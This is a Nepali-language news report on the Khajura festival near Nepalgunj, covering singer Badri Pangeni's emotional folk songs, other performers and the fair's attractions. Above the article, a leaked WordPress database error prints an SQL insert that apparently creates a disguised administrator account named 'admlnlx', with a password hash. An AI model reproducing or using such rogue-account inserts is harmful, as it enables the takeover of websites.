WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLjrCuCV7uvHM4dkIVePoa6J3Z5V5Z0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:36:24', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, माघ १९ –
तिस हजार दर्शकले भरीभराउ महोत्सव स्थलमा हिडडुल गर्न नै हम्मे हम्मे हुन्थो । श्री पन्चमीको दिन वर्षेनि खजुरामा मेला लाग्ने भएकाले पनि बुधबार भिड नबढ्ने कुरै थिएन । त्यसैपनि मेलामा सुरक्षा व्यवस्था मिलाउन गा¥यो भैरहेको थियो ।
बुधबार पालो पाएका खजुरा महोत्सवमा लोक तथा दोहोरी गायक बद्रि पगेनि स्टेज चढ्नासाथ तालिको गुन्जाएमान भयो । उनले यत्रतत्र रुपमा छरीएका दर्शकलाई एउटा छोरो काहाँ छ कहाँ अर्को छोरा साउदिमा भर्ति भाको छ गित गाएर ध्यान आफैतिर केन्द्रित गरे । बद्रिले उक्त गित गाउदै गर्दा थुप्रै महिलाहरुले आप्नो छोरा सम्झेर आसु नै निकालेर रोए ।
आखाँभरी आसु बनाएका आमा दिदिबहिनीलाई रातो पछौरी अनि तातो पछौरी ….बोलको गित गाएर मस्ख पारे । गाएक पगेनिले खान्न मत पिडालु कुक्कायो, पञ्चेबाजा, ससुरालिमा गाएर नचाएर ए आमा एस पालि नि आउन पाइन विरहका गित गाएर पुनः नाचेका आमाहरुलाई रुवाए ।
साझको ६ बजे सम्म पनि दर्शकको कमि नभएपनि चिसोको सिरोठोले नहान्दा सम्म गाइरहे । उनले आफ्ना एक दर्जन गित गाएर दर्शकलाई भरपुर मनोरन्जन प्रदान गरे । अन्यमा बद्रिले कलाकार निरुता पाल्पाली सगँ दोहोरी समेत गाए ।
गायिका रेश्मा पुनले पनि उपस्थित दर्शकलाई आफ्ना गितहरुबाट थप रौनकता प्रदान गरीन । हाम्रो खजुरा हाम्रो शान, धार्मिक सदभाव हाम्रो पहिचान भन्ने मुल नाराका साथ सुरु भएको कृर्षि पर्यटन प्रर्बद्धन साँस्कृतिक एंव ऐतिहासिक धार्मिक मुसवेटवा बाबा मेला तथा प्रथम ब्यापारिक खजुरा महोत्सवमा मौतका कुवा, पिङ्ग, बोटिङग, थारु परीकार लगायत कृषि प्रर्दशनि व्यापार मेलाको समेत अवलोकन गर्ने व्यवस्था मिलाइएको आयोजक आधुनिक युवा सन्जालका अध्यक्ष तिलकविर सुनारले बताए ।
बुधबार नै हिन्दु र मुस्लिम धर्मालम्भीहरुले मुसबेटवा बाबाको मजारमा च्यादर चढाएर बर मागेका छन ।